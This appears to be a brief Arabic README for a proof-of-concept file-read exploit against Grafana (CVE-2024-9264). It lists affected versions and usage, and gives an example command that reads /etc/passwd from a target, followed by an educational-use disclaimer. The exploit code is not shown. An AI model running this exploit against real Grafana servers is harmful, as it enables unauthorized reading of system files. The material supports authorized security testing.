
إثبات المفهوم لقراءة الملفات لـ CVE-2024-9264
إثبات المفهوم لقراءة الملفات في Grafana (CVE-2024-9264)
Viewer أو أعلىGrafana >= v11.0.0 (جميع الإصدارات v11.x.y متأثرة)
python3 poc.py [--url <target>] [--user <username>] [--password <password>] [--file <path>]
python3 poc.py --url http://127.0.0.1:3000 --user eviluser --password eviluser --file /etc/passwd
تم تصميم هذا البرنامج النصي للأغراض التعليمية وللاستخدام في بيئات خاضعة للرقابة حيث لديك الإذن لاختبار أمان النظام. قد يؤدي إساءة استخدام هذه الأداة إلى عواقب قانونية.